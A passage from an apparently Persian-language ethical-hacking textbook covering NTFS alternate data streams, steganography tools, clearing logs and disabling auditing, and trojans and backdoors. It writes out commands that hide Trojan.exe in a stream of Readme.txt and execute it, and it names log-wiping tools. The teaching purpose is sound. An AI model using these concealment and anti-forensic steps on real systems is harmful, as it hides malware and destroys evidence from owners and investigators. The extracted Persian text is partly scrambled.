.1 در cmd ، دﺳﺘﻮر noepad test.txt را ﺗﺎﻳﭗ ﻛﻨﻴﺪ. .2 ﻓﺎﻳﻞ را ﺑﺎ اﻃﻼﻋﺎﺗﻲ ﭘﺮ ﻛﻨﻴﺪ و ﺳﭙﺲ آن را ﺑﺒﻨﺪﻳﺪ. .3 در cmd ، دﺳﺘﻮر dir test.txt را وارد ﻛﻨﻴﺪ و ﺑﻪ اﻧﺪازه آن دﻗﺖ ﻛﻨﻴﺪ. .4 در cmd ، دﺳﺘﻮر notepad test.txt:hidden.txt را ﺗﺎﻳﭗ ﻛﻨﻴﺪ . داﺧﻞ ﻓﺎﻳﻞ را ﺑﺎ ﻣﻄﺎﻟﺒﻲ ﭘﺮ ﻛﻨﻴﺪ و آن را ذﺧﻴﺮه ﻛﻨﻴﺪ. .5 دوﺑﺎره اﻧﺪازه ﻓﺎﻳﻞ را ﺑﺮرﺳﻲ ﻛﻨﻴﺪ ( ﺑﺎﻳﺪ ﻧﺴﺒﺖ ﺑﻪ ﻗﺒﻞ ﺗﻔﺎوﺗﻲ ﻧﻜﺮده ﺑﺎﺷﺪ ). .Test.txt 6 را ﺑﺎز ﻛﻨﻴﺪ . ﺑﺎﻳﺪ ﻓﻘﻂ داده ﻫﺎي اﺻﻠﻲ را ﺑﺒﻴﻨﻴﺪ. .7 دﺳﺘﻮر type test.txt:hidden.txt را در cmd ﺗﺎﻳﭗ ﻛﻨﻴﺪ . ﭘﻴﺎم ﺧﻄﺎ ﻧﻤﺎﻳﺶ داده ﻣﻲ ﺷﻮد. .8 ﺑﺮاي اﻳﻨﻜﻪ ﻣﺤﺘﻮاي Trojan.exe را ﺑﻪ Readme.txt اﻧﺘﻘﺎل دﻫﻴﺪ، از دﺳﺘﻮر زﻳﺮ اﺳﺘﻔﺎده ﻛﻨﻴﺪ: C:\> type c:\Trojan.exe > c:\Readme.txt:Trojan.exe .9 ﺑﺮاي اﺟﺮاي Trojan.exe در Readme.txt ، از دﺳﺘﻮر زﻳﺮ اﺳﺘﻔﺎده ﻛﻨﻴﺪ: C:\> start c:\Readme.txt:Trojan.exe .10 ﺑﺮاي extract ﻛﺮدن Trojan.exe از Readme.txt از دﺳﺘﻮر زﻳﺮ اﺳﺘﻔﺎده ﻛﻨﻴﺪ: C:\> cat c:\Readme.txt:Trojan.exe > Trojan.exe

اﺑﺰارﻫﺎي ﻫﻚ Makestrm.exe ، ﺑﺮﻧﺎﻣﻪ اي اﺳﺖ ﻛﻪ داده ﻫﺎ را از ﻳﻚ ﻓﺎﻳﻞ ﺑﻪ ﻳﻚ alternate data stream ﻛﻪ ﺑﻪ ﻓﺎﻳﻞ اﺻﻠﻲ ﻟﻴﻨﻚ اﺳﺖ، ﻣﻨﺘﻘﻞ ﻣﻲ ﻛﻨﺪ . .

ﻣﻘﺎﺑﻠﻪ ﺑﺎ NTFS Stream

ﺑﺮاي ﺣﺬف ﻳﻚ stream file، اﺑﺘﺪا آن ﻓﺎﻳﻞ را ﺑﻪ ﭘﺎرﺗﻴﺸﻨﻲ ﻛﻪ داراي ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ FAT ﺑﺎﺷﺪ ﻛﭙﻲ ﻛﻨﻴﺪ و ﺳﭙﺲ دوﺑﺎره ﺑﻪ ﭘﺎرﺗﻴﺸﻦ NTFS ﺑﺮﮔﺮداﻧﻴﺪ . زﻣﺎﻧﻴﻜﻪ ﻓﺎﻳﻠﻲ را ﺑﻪ ﭘﺎرﺗﻴﺸﻦ FAT ﺟﺎﺑﺠﺎ ﻣﻲ ﻛﻨﻴﺪ، ﺧﺎﺻﻴﺖ stream ﺣﺬف ﻣﻲ ﺷﻮد ﺑﺮاي اﻳﻨﻜﻪ streaming ﻳﻜﻲ از ﻗﺎﺑﻠﻴﺖ ﻫﺎي NTFS اﺳﺖ و ﺗﻨﻬﺎ ﺑﺎ اﻳﻦ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ وﺟﻮد دارد . .

اﺑﺰارﻫﺎي ﻫﻚ ﺷﻤﺎ ﻣﻲ ﺗﻮاﻧﻴﺪ از LNS.exe ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ NTFS streams اﺳﺘﻔﺎده ﻛﻨﻴﺪ . اﮔﺮ ﻓﺎﻳﻞ steam وﺟﻮد داﺷﺘﻪ ﺑﺎﺷﺪ، اﻳﻦ ﺑﺮﻧﺎﻣﻪ، آن را ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲ ﻛﻨﺪ و ﻣﻜﺎن آن را ﮔﺰارش ﻣﻲ دﻫﺪ . .

82

ﺗﻜﻨﻮﻟﻮژي ﻫﺎي Steganography

Steganography ، ﻓﺮآﻳﻨﺪ ﻣﺨﻔﻲ ﻛﺮدن داده ﻫﺎ در ﻧﻮع دﻳﮕﺮي از ﻓﺎﻳﻞ ﻫﻤﭽﻮن ﻋﻜﺲ ﻳﺎ ﻓﺎﻳﻞ ﻣﺘﻨﻲ اﺳﺖ . ﻣﺤﺒﻮب ﺗﺮﻳﻦ روش ﺑﺮاي ﻣﺨﻔﻲ ﻛﺮدن داده ﻫﺎ در ﻓﺎﻳﻞ ﻫﺎ، اﺳﺘﻔﺎده از ﻋﻜﺲ ﻫﺎي ﮔﺮاﻓﻴﻜﻲ ﺑﻪ ﻋﻨﻮان ﻣﺤﻞ ﻣﺨﻔﻲ ﻛﺮدن اﺳﺖ . ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺎ اﺳﺘﻔﺎده از steganography ، ﻫﺮ اﻃﻼﻋﺎﺗﻲ را داﺧﻞ ﻓﺎﻳﻞ ﮔﺮاﻓﻴﻜﻲ ﺟﺎﺳﺎزي ﻛﻨﺪ . .

اﺑﺰارﻫﺎي ﻫﻚ ImageHide ، ﺑﺮﻧﺎﻣﻪ steganography اﺳﺖ ﻛﻪ ﻣﻘﺎدﻳﺮ ﺑﺰرﮔﻲ از ﻣﺘﻦ را داﺧﻞ ﻋﻜﺲ ﻣﺨﻔﻲ ﻣﻲ ﻛﻨﺪ . ﺣﺘﻲ ﭘﺲ از اﺿﺎﻓﻪ ﻛﺮدن داده ﻫﺎ، اﻧﺪازه ﻓﺎﻳﻞ اﻓﺰاﻳﺶ ﻧﻤﻲ ﻳﺎﺑﺪ . در ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﮔﺮاﻓﻴﻜﻲ ﻣﻌﻤﻮﻟﻲ، ﻋﻜﺲ ﺑﻪ ﻃﻮر ﻃﺒﻴﻌﻲ ﻧﺸﺎن داده ﻣﻲ ﺷﻮد . داده ﻫﺎ را داﺧﻞ ﺧﻮدش ﺑﺎرﮔﺬاري و ذﺧﻴﺮه ﻣﻲ ﻛﻨﺪ ﺑﻨﺎﺑﺮاﻳﻦ sniffer ﻫﺎي اﻳﻤﻴﻞ، ﻧﻤﻲ ﺗﻮاﻧﻨﺪ آن را ﺗﺸﺨﻴﺺ دﻫﻨﺪ . .

Blindside ، ﺑﺮﻧﺎﻣﻪ دﺳﺘﻮري steganography اﺳﺖ ﻛﻪ اﻃﻼﻋﺎت را داﺧﻞ ﻋﻜﺲ ﻫﺎي BMP ﻣﺨﻔﻲ ﻣﻲ ﻛﻨﺪ . .

MP3Stego ، اﻃﻼﻋﺎت را داﺧﻞ ﻓﺎﻳﻞ ﻫﺎي ﮔﺮاﻓﻴﻜﻲ ﻣﺨﻔﻲ ﻣﻲ ﻛﻨﺪ . داده ﻫﺎ، ﻓﺸﺮده و رﻣﺰﮔﺬاري ﻣﻲ ﺷﻮﻧﺪ و ﺳﭙﺲ در MP3 bit stream ﻣﺨﻔﻲ ﻣﻲ ﺷﻮﻧﺪ . .

Snow ، ﺑﺮﻧﺎﻣﻪ whitespace steganography اﺳﺖ ﻛﻪ ﭘﻴﺎم ﻫﺎ را در ﻣﺘﻦ ASCII ﻣﺨﻔﻲ ﻣﻲ ﻛﻨﺪ ﻛﻪ اﻳﻨﻜﺎر را ﺑﺎ اﺳﺘﻔﺎده از ﺿﻤﻴﻤﻪ ﻛﺮدن whitespace ﺑﻪ اﻧﺘﻬﺎي ﺧﻂ ﻫﺎ اﻧﺠﺎم ﻣﻲ دﻫﺪ . از آﻧﺠﺎﺋﻴﻜﻪ whitespace ﻫﺎ در ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﻣﺘﻨﻲ ﻗﺎﺑﻞ ﻣﺸﺎﻫﺪه ﻧﻴﺴﺘﻨﺪ، ﭘﻴﺎم ﺑﻪ راﺣﺘﻲ ﻣﺨﻔﻲ ﻣﻲ ﺷﻮد . اﮔﺮ از رﻣﺰﮔﺬاري اﺳﺘﻔﺎده ﺷﻮد، ﺣﺘﻲ در ﺻﻮرت ﺗﺸﺨﻴﺺ، ﭘﻴﺎم ﻗﺎﺑﻞ ﺧﻮاﻧﺪن ﻧﻴﺴﺖ . .

Camera/Shy ، ﺑﺎ وﻳﻨﺪوز و IE ﻛﺎر ﻣﻲ ﻛﻨﺪ و ﺑﻪ ﻛﺎرﺑﺮان اﺟﺎزه ﻣﻲ دﻫﺪ ﻛﻪ اﻃﻼﻋﺎت ﺣﺴﺎس ﺧﻮد را داﺧﻞ ﻳﻚ ﻓﺎﻳﻞ ﻋﻜﺲ gif ذﺧﻴﺮه ﻛﻨﻨﺪ . .

Masker Steganography ، ﺑﺮﻧﺎﻣﻪ اي ﺑﺮاي رﻣﺰﮔﺬاري و ﻣﺨﻔﻲ ﻛﺮدن ﻓﺎﻳﻞ ﻫﺎ داﺧﻞ ﻓﺎﻳﻞ دﻳﮕﺮ اﺳﺖ . .

83

Stealth Files ، ﻓﺎﻳﻞ ﻫﺎي اﺟﺮاﻳﻲ را داﺧﻞ ﻓﺎﻳﻞ ﻫﺎي دﻳﮕﺮي ﻫﻤﭽﻮن PowerPoint ، Excel ، Word و Acrobat ادﻏﺎم ﻣ ﻲ ﻛﻨﺪ . .

DCPP : اﺑﺰاري ﺑﺮاي ﻣﺨﻔﻲ ﻛﺮدن ﻛﻞ ﻳﻚ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ داﺧﻞ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ دﻳﮕﺮ اﺳﺖ . .

ﺑﺮﻧﺎﻣﻪ ﻫﺎي دﻳﮕﺮ ﻛﻪ ﺑﺮاي steganography اﺳﺘﻔﺎده ﻣﻲ ﻧﺷﻮ ﺪ ﻋﺒﺎرﺗﻨﺪ از : : wbStego ، Gifshuffle ، Pretty Good Envelop ، Steganos ، Steghide ، S- Tools ، Blindside ، Fort Knox ، ، Video Steganography ، FoxHole ، Stegomagic ، StegaNote ، Cloak ، Hydan ، Data Stash ، OutGuess.

ﺑﺮﺧﻲ از ﺑﺮﻧﺎﻣﻪ ﻫﺎ ﻣﻲ ﺗﻮاﻧﻨﺪ steganography را ﺷﻨﺎﺳﺎﻳﻲ ﻛ ﻨﻨﺪ ﻫﺮ ﭼﻨﺪ ﻛﻪ اﻧﺠﺎم آن ﺳﺨﺖ اﺳﺖ . .

اﺑﺰارﻫﺎي ﻣﻘﺎﺑﻠﻪ Stegdetect ، اﺑﺰاري ﺧﻮدﻛﺎر ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ ﻣﺤﺘﻮاي steganographic در ﺗﺼﺎوﻳﺮ اﺳﺖ و ﻣﻲ ﺗﻮاﻧﺪ روش ﻫﺎي ﻣﺨﺘﻠﻒ Steganography را ﺑﺮاي ﺟﺎﺳﺎزي اﻃﻼﻋﺎت ﻣﺨﻔﻲ در ﺗﺼﺎوﻳﺮ ﺗﺸﺨﻴﺺ دﻫﺪ . .

Dskprobe ، اﺑﺰاري در CD وﻳﻨﺪوز 2000 اﺳﺖ . ﻛﻪ ﻳﻚ اﺳﻜﻨﺮ ﺳﻄﺢ ﭘﺎﻳﻴﻦ ﻫﺎرد دﻳﺴﻚ اﺳﺖ و ﻣﻲ ﺗﻮاﻧﺪ steganography رو ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ . .

ﭘﺎك ﻛﺮدن ردﭘﺎﻫﺎ و ﻣﺪارك

زﻣﺎﻧﻴﻜﻪ ﻫﻜﺮ ﺗﻮاﻧﺴﺖ ﺑﻪ ﺳﻴﺴﺘﻤﻲ دﺳﺘﺮﺳﻲ ﭘﻴﺪا ﻛﻨﺪ، ﺗﻼش ﺧﻮاﻫﺪ ﻛﺮد ﻛﻪ ردﭘﺎﻫﺎ را ﺎﭘ ك ﺪﻨﻛ ﺗﺎ از ﺷﻨﺎﺳﺎﻳﻲ ﺷﺪ ،ن در اﻣﺎن ﺑﻤﺎﻧﺪ . ﻫﻤﭽﻨﻴﻦ ﻣﻤﻜﻦ اﺳﺖ ﻛﻪ ﺑﺨﻮاﻫﺪ ﻣﺪارك ﺷﻨﺎﺳﺎﻳﻲ ﻳﺎ ﻓﻌﺎﻟﻴﺖ ﻫﺎي ﺧﻮد را ﺑﺮ روي ﺳﻴﺴﺘﻢ ﭘﺎك ﻛﻨﺪ . ﻣﻌﻤﻮﻻ ﻫﻜﺮﻫﺎ ﺗﻤﺎم ﭘﻴﻐﺎم ﻫﺎي ﺧﻄﺎ ﻳﺎ اﻣﻨﻴﺘﻲ ﻛﻪ ﺛﺒﺖ ﻣﻲ ﺷﻮﻧﺪ را ﭘﺎك ﻣﻲ ﻛﻨﺪ ﺗﺎ از ﺷﻨﺎﺳﺎﻳﻲ ﺧﻮد ﻣﻤﺎﻧﻌﺖ ﺑﻪ ﻋﻤﻞ آور .ﺪﻧ .ﺪﻧ

84

ﻏﻴﺮ ﻓﻌﺎل ﻛﺮدن Auditing

اوﻟﻴﻦ ﭼﻴﺰي ﻛﻪ ﻫﻜﺮ ﺑﻌﺪ از دﺳﺘﺮﺳﻲ ﺑﻪ ﺳ ﻴﺴﺘﻢ اﻧﺠﺎم ﻣﻲ دﻫﺪ، ﻏﻴﺮ ﻓﻌﺎل ﻛﺮدن auditing اﺳﺖ . auditing وﻳﻨﺪوز، رﺧﺪادﻫﺎي ﻣﺸﺨﺼﻲ را در ﻓﺎﻳﻞ log ﻛﻪ در ﻗﺴﻤﺖ Windows Event Viewer ﻗﺮار دارد، ذﺧﻴﺮه ﻣﻲ ﻛﻨﺪ . اﻳﻦ رﺧﺪادﻫﺎ ﺷﺎﻣﻞ ورود ﺑﻪ ﺳﻴﺴﺘﻢ، ﻳﺎ ﻳﻚ Event log اﺳﺖ . ﻣﺪﻳﺮ ﺳﻴﺴﺘﻢ ﻣﻲ ﺗﻮاﻧﺪ ﺳﻄﺢ اﻳﻦ ذﺧﻴﺮه ﺳﺎزي رﺧﺪادﻫﺎ را اﻧﺘﺨﺎب ﻛﻨﺪ . ﻫﻜﺮ ﻣﻲ ﺧﻮاﻫﺪ ﻛﻪ ﺳﻄﺢ ﺛﺒﺖ رﺧﺪادﻫﺎ را ﻣﺸﺨﺺ ﻛﻨﺪ ﺗﺎ ﺑﺒﻴﻨﺪ آﻳﺎ ﻧﻴﺎزي ﺑﻪ ﭘﺎك ﻛﺮدن رﺧﺪادﻫﺎﻳﻲ ﻛﻪ ﺣﻀﻮر او را در ﺳﻴﺴﺘﻢ ﺛﺒﺖ ﻛﻨﺪ وﺟﻮد دارد ﻳﺎ ﻧﻪ . .

اﺑﺰارﻫﺎي ﻫﻚ AuditPol ، اﺑﺰاري اﺳﺖ ﻛﻪ ﻣﻲ ﺗﻮاﻧﺪ ﺑﻪ ﺻﻮرت دﺳﺘﻮري، auditing را در وﻳﻨﺪوز، ﻓﻌﺎل ﻳﺎ ﻏﻴﺮ ﻓﻌﺎل ﻛﻨﺪ . اﻳﻦ اﺑﺰار، ﻣﻲ ﺗﻮاﻧﺪ ﺳﻄﺢ ﺛﺒﺖ رﺧﺪادﻫﺎ را ﻛﻪ ﺗﻮﺳﻂ ﻣﺪﻳﺮ ﺳﻴﺴﺘﻢ ﻫﺎ ﺗﻌﻴﻴﻦ ﺷﺪه اﺳﺖ را ﻧﻴﺰ ﻣﺸﺨﺺ ﻛﻨﺪ . .

ﭘﺎك ﻛﺮدن Event Log

ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺑﻪ راﺣﺘﻲ، رﻛﻮردﻫﺎي ﻣﻮﺟﻮد در Windows Event Viewer را ﭘﺎك ﻛﻨﺪ . اﮔﺮ ﺗﻨﻬﺎ ﻳﻚ ﻳﺎ ﭼﻨﺪ رﻛﻮرد در اﻳﻦ ﻗﺴﻤﺖ وﺟﻮد داﺷﺘﻪ ﺑﺎﺷﺪ، ﻣﺸﻜﻮك اﺳﺖ ﺑﺮاي اﻳﻨﻜﻪ ﻧﺸﺎن ﻣﻲ دﻫﺪ رﺧﺪادﻫﺎي دﻳﮕﺮ ﭘﺎك ﺷﺪه اﺳﺖ . ﻫﻨﻮز ﻫﻢ ﻻزم اﺳﺖ ﻛﻪ ﭘﺲ از ﻏﻴﺮ ﻓﻌﺎل ﻛﺮدن auditing ، ﻗﺴﻤﺖ Event Viewer را ﭘﺎك ﻛ ﺪﻴﻨ ﺑﺮاي اﻳﻨﻜﻪ ﺑﻌﺪ از اﺳﺘﻔﺎده از اﺑﺰار AuditPol ، رﺧﺪادي ﻣﺒﻨﻲ ﺑﺮ ﻏﻴﺮ ﻓﻌﺎل ﺷﺪن auditing ، در اﻳﻦ ﻗﺴﻤﺖ ﺛﺒﺖ ﻣﻲ ﺷﻮد . ﺑﺮاي ﭘﺎك ﻛﺮدن event log ، اﺑﺰارﻫﺎي زﻳﺎدي وﺟﻮد دارد . .

85

اﺑﺰارﻫﺎي ﻫﻚ Elsave.exe ، اﺑﺰار ﺳﺎده اي ﺑﺮاي ﭘﺎك ﻛﺮدن event log اﺳﺖ . اﻳﻦ اﺑﺰار ﺑﻪ ﺻﻮرت ﺧﻂ دﺳﺘﻮري اﺳﺖ . .

WinZapper ، اﺑﺰاري اﺳﺖ ﻛﻪ ﻫﻜﺮ ﻣﻲﺗﻮاﻧﺪ ﺑﺮاي ﭘﺎك ﻛﺮدن رﻛﻮردﻫﺎي اﻧﺘﺨﺎﺑﻲ از رﺧﺪادﻫﺎ در security log وﻳﻨﺪوز 2000 ، ﺑﻪ ﻛﺎر دﺮﺒﺑ . WinZapper ، اﻃﻤﻴﻨﺎن ﻣﻲ دﻫﺪ ﻛﻪ در ﻃﻮل اﺟﺮاي ﺑﺮﻧﺎﻣﻪ، ﻫﻴﭻ رﺧﺪاد اﻣﻨﻴﺘﻲ ﺛﺒﺖ ﻧﻤﻲ ﺷﻮد . .

Evidence Eliminator ، ﻳﻚ ﺳﻴﺴﺘﻢ data cleaning ﺑﺮاي ﻛﺎﻣﭙﻴﻮﺗﺮﻫﺎي وﻳﻨﺪوزي اﺳﺖ ﻛﻪ از ﻣﺨﻔﻲ ﺷﺪن ﻫﻤﻴﺸﮕﻲ داده ﻫﺎ در ﺳﻴﺴﺘﻢ ﺟﻠﻮﮔﻴﺮي ﻣﻲ ﻛﻨﺪ . اﻳﻦ ﻧﺮم اﻓﺰار، ﻗﺴﻤﺖ ﻫﺎي system files ، Internet cache ، Recycle bin ، temp folders و ... را ﭘﺎك ﻣﻲ ﻛﻨﺪ . Evidence Eliminator ، ﻣﻲ ﺗﻮاﻧﺪ ﺗﻮﺳﻂ ﻫﻜﺮ ﺑﺮاي ﭘﺎك ﻛﺮدن ﺷﻮاﻫﺪ و ﻣﺪارك ﻫﻚ ﺳﻴﺴﺘﻢ ﻣﻮرد اﺳﺘﻔﺎده ﻗﺮار ﮔﻴﺮد . .

اﺑﺰارﻫﺎي دﻳﮕﺮي ﻧﻴﺰ ﺑﺮاي ﭘﺎك ﻛﺮدن ردﭘﺎﻫﺎ وﺟﻮد دارﻧﺪ ﻛﻪ ﻣﻬﻢ ﺗﺮﻳﻦ آﻧﻬﺎ ﻋﺒﺎرﺗﻨﺪ از : : • Traceless • Tracks Eraser Pro • Aromor • ZeroTracks • PhatBooster

86

ﻓﺼﻞ ﭘﻨﺠﻢ

Trojan, Backdoor, Virus, Worm

ﻣﻘﺪﻣﻪ

ﺗﺮوﺟﺎن ﻫﺎ و backdoor ﻫﺎ دو روﺷﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻫﻜﺮ ﻫﺎ ﻣﻲ ﺗﻮاﻧﻨ ﺪ از ﻃﺮﻳﻖ آﻧﻬﺎ وارد ﺳﻴﺴﺘﻤﻲ ﺑ ﺪﻧﺸﻮ و اﻧﻮاع ﻣﺨﺘﻠﻔﻲ دارﻧﺪ وﻟﻲ ﻫﻤﮕﻲ داراي ﻳﻚ ﻧﻘﻄﻪ ﻣﺸﺘﺮك ﻫﺴﺘﻨﺪ : ﺑﺎﻳﺪ ﺗﻮﺳﻂ ﺑﺮﻧﺎﻣﻪ اي دﻳﮕﺮي ﻧﺼﺐ ﺷﻮﻧﺪ ﻳﺎ ﻛﺎرﺑﺮ ﺑﺮاي ﻧﺼﺐ آﻧﻬﺎ در ﺳﻴﺴﺘﻢ، ﻣﺪاﺧﻠﻪ ﻛﻨﺪ . ﺗﺮوﺟﺎن ﻫﺎ و backdoor ﻫﺎ، از اﺑﺰارﻫﺎي ﺧﻄﺮﻧﺎك در toolkit ﻫﻜﺮ ﻗﺎﻧﻮﻧﻤﻨﺪ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺎﻳﺪ ﺑﺮاي ﺗﺴﺖ اﻣﻨﻴﺖ ﻳﻚ ﺳﻴﺴﺘﻢ ﻳﺎ ﺷﺒﻜﻪ ﻣﻮرد اﺳﺘﻔﺎده ﻗﺮار ﮔﻴﺮﻧﺪ . .

وﻳﺮوس ﻫﺎ و worm ﻫﺎ ﻧﻴﺰ ﻣﻲ ﺗﻮاﻧﻨﺪ ﻣﺜﻞ ﺗﺮوﺟﺎن ﻫﺎ و backdoor ،ﻫﺎ ﺧﻄﺮﻧﺎك ﺑﺎﺷﻨﺪ . در ﺣﻘﻴﻘﺖ، ﺑﺴﻴﺎري از وﻳﺮوس ﻫﺎ، ﺳﺒﺐ ﻓﻌﺎل ﺷﺪن ﺗﺮوﺟﺎن ﻣﻲ ﺷﻮﻧﺪ و ﻣﻲ ﺗﻮاﻧﻨ ﺪ ﺑﻪ ﺳﻴﺴﺘﻢ آﺳﻴﺐ ﺑﺮ ﺪﻨﻧﺎﺳ و ﺳﭙﺲ، ﺑﺮاي ﻫﻜﺮ، backdoor ﺑﺎز ﻛﻨﻨﺪ . اﻳﻦ ﻓﺼﻞ در ﻣﻮرد ﺷﺒﺎﻫﺖ ﻫﺎ و ﺗﻔﺎوت ﻫﺎي ﺑﻴﻦ ﺗﺮوﺟﺎن ﻫﺎ، backdoor ﻫﺎ، وﻳﺮوس ﻫﺎ و worm ﻫﺎ ﺻﺤﺒﺖ ﻣﻲ ﻛﻨﺪ . ﻫﻤﻪ اﻳﻦ ا ﺑﺰارﻫﺎ و ﻛﺪﻫﺎي ﻣﺨﺮب، ﺑﺮاي ﻫﻜﺮﻫﺎي ﻗﺎﻧﻮﻧﻤﻨﺪ، ﻣﻬﻢ ﻫﺴﺘﻨﺪ ﺑﺮاي اﻳﻨﻜﻪ ﻫﻜﺮﻫﺎ از اﻳﻦ اﺑﺰارﻫﺎ ﺑﺮاي ﺣﻤﻠﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺎ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . .

ﺗﺮوﺟﺎن ﻫﺎ و backdoor ﻫﺎ ﻫﺎ

Backdoor ، ﺑﺮﻧﺎﻣﻪ ﻳﺎ ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﻣﺮﺗﺒﻄﻲ اﺳﺖ ﻛﻪ ﺮﻫﻜ آن را ﺑﺮ روي ﺳﻴﺴﺘﻢ ﻲﻧﺎﺑﺮﻗ ﻧﺼﺐ ﻣﻲ ﻛﻨﺪ ﺗﺎ ﺑﻌﺪا ﺑﺘﻮاﻧﺪ از ﻃﺮﻳﻖ آن، وارد ﺳﻴﺴﺘﻢ ﺷﻮد . ﻫﺪف backdoor ، ﺣﺬف ﺷﻮاﻫﺪ ﺣﻤﻠﻪ از ﻓﺎﻳﻞ ﻫﺎي log اﺳﺖ ﻳﺎ ﻣﻤﻜﻦ اﺳﺖ ﻫﺪف backdoor ، دﺳﺘﺮﺳﻲ ﻫﻜﺮ ﺑﻪ ﺳﻴﺴﺘﻢ ﺑﺼﻮرت ﻫﻤﻴﺸﮕﻲ ﺑﺎﺷﺪ ؛ ﺣﺘﻲ اﮔﺮ ﺣﻤﻠﻪ ﺗﻮﺳﻂ ﻣﺪﻳﺮ ﺳﻴﺴﺘﻢ ﺗﺸﺨﻴﺺ داده ﺷﻮد و ﺟﻠﻮﮔﻴﺮي ﺷﻮد . .

ﻳﻜﻲ از راﻳﺞ ﺗﺮﻳﻦ ﺗﻜﻨﻴﻚ ﻫﺎي ﻣﺨﻔﻲ ﺳﺎزي backdoor در ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ وﻳﻨﺪوز، اﺿﺎﻓﻪ ﻛﺮدن ﺳﺮوﻳﺲ اﺳﺖ . ﻗﺒﻞ از ﻧﺼﺐ ﻳﻚ backdoor ، ﻫﻜﺮ ﺑﺎﻳﺪ ﺳﻴﺴﺘﻢ را ﺑﺮرﺳﻲ ﻛﻨﺪ ﺗﺎ ﺳﺮوﻳﺲ ﻫﺎي در ﺣﺎل اﺟﺮا را ﭘﻴﺪا ﻛﻨﺪ . ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺳﺮوﻳﺲ ﺟﺪﻳﺪي را اﺿﺎﻓﻪ ﻛﻨﺪ و اﺳﻢ ﻏﻴﺮ ﻣﻬﻤﻲ ﺑﻪ آن ﺑﺪﻫﺪ ﻳﺎ از ﺳﺮوﻳﺴ ﻲ ﻛﻪ اﺻ ﻼ اﺳﺘﻔﺎده ﻧﻤﻲ ﺷﻮد و ﻏﻴﺮ ﻓﻌﺎل اﺳﺖ اﺳﺘﻔﺎده ﻛﻨﺪ . .

اﻳﻦ ﺗﻜﻨﻴﻚ ﺧﻮﺑﻲ اﺳﺖ ﺑﺮاي اﻳﻨﻜﻪ زﻣﺎﻧﻴﻜﻪ ﻫﻚ رخ ﻣﻲ دﻫﺪ ، ﻣﻌﻤﻮﻻ ﻣﺪﻳﺮان ﺳﻴﺴﺘﻢ ﻫﺎ ﺑﻪ دﻧﺒﺎل ﺧر داﺪ ﻋﺠﻴﺐ در ﺳﻴﺴﺘﻢ ﻫﺴﺘﻨﺪ و ﺳﺮوﻳﺲ ﻫﺎي ﻣﻮﺟﻮد را ﺑﺮرﺳﻲ ﻧﻤﻲ ﻛﻨﻨﺪ . ﺗﻜﻨﻴﻚ backdoor ، ﺳﺎده و در ﻋﻴﻦ ﺣﺎل ﻛﺎرا اﺳﺖ :

88

ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺎ ﻛﻤﺘﺮﻳﻦ ﺷﻮاﻫﺪ در log ﻫﺎي ﺳﺮور، وارد ﺳﻴﺴﺘﻢ ﺷﻮد . ﺳﺮوﻳﺴﻲ ﻛﻪ ﺑﻪ ﻋﻨﻮان backdoor ﺷﺪه اﺳﺖ، اﺟﺎزه اﺳﺘﻔﺎده از ﺳﻴﺴﺘﻢ ﺑﺎ دﺳﺘﺮﺳﻲ ﺑﺎﻻ ار ﺑﻪ ﻫﻜﺮ ﻣﻲ دﻫﺪ . .

RAT ﻫﺎ، ﻧﻮﻋﻲ از backdoor ﻫﺎ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺮاي ﻓﻌﺎل ﻛﺮدن ﻛﻨﺘﺮل از راه دور ﺑﺮ روي ﺳﻴﺴﺘﻢ ﻫﺪف اﺳﺘﻔﺎده ﻣﻲ ﺪﻧﺷﻮ و ﻣﻲ ﺗﻮاﻧﻨﺪ ﭘﻮرت ﻫﺎ را ﺑﺮ روي ﻛﺎﻣﭙﻴﻮﺗﺮ ﻗﺮﺑﺎﻧﻲ ﺑﺎز ﻛﻨﻨﺪ . زﻣﺎﻧﻴﻜﻪ RAT اﺟﺮا ﺷﺪ، ﻣﺜﻞ ﻳﻚ ﻓﺎﻳﻞ اﺟﺮاﻳﻲ ﻋﻤﻞ ﻣﻲ ﻛﻨﺪ و ﺑﺎ ﻛﻠﻴﺪﻫﺎي رﺟﻴﺴﺘﺮي ﺧﺎﺻﻲ ﻛﻪ ﻣﺴﺌﻮل اﺟﺮاي ﺳﺮوﻳﺲ ﻫﺎ ﻫﺴﺘﻨﺪ ﺗﻌﺎﻣﻞ ﻣﻲ ﻛﻨﺪ و ﺑﻌﻀﻲ وﻗﺖ ﻫﺎ ﻫﻢ ﺳﺮوﻳﺲ ﻫﺎﻳﻲ را اﻳﺠﺎد ﻣﻲ ﻛﻨﺪ . ﺑﺮﺧﻼف backdoor ﻫﺎي راﻳﺞ، RAT ﻫﺎ ﺧﻮد را داﺧﻞ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻗﺮﺑﺎﻧﻲ ﻛﭙﻲ ﻣﻲ ﻛﻨﻨﺪ و ﻫﻤﻴﺸﻪ ﺑﺎ دو ﻓﺎﻳﻞ ﻫﻤﺮاه ﻫﺴ ﺪﻨﺘ : ﻓﺎﻳﻞ ﻛﻼﻳﻨﺖ و ﻓﺎﻳﻞ ﺳﺮور . ﻓﺎﻳﻞ ﻛﻼﻳﻨﺖ ﺑﺮ روي ﻣﺎﺷﻴﻦ ﻫﺪف ﻧﺼﺐ ﻣﻲ ﺷﻮد و ﻓﺎﻳﻞ ﺳﺮور ، ﺗﻮﺳﻂ ﻫﻜﺮ ﺑﺮاي ﻛﻨﺘﺮل ﺳﻴﺴﺘﻢ 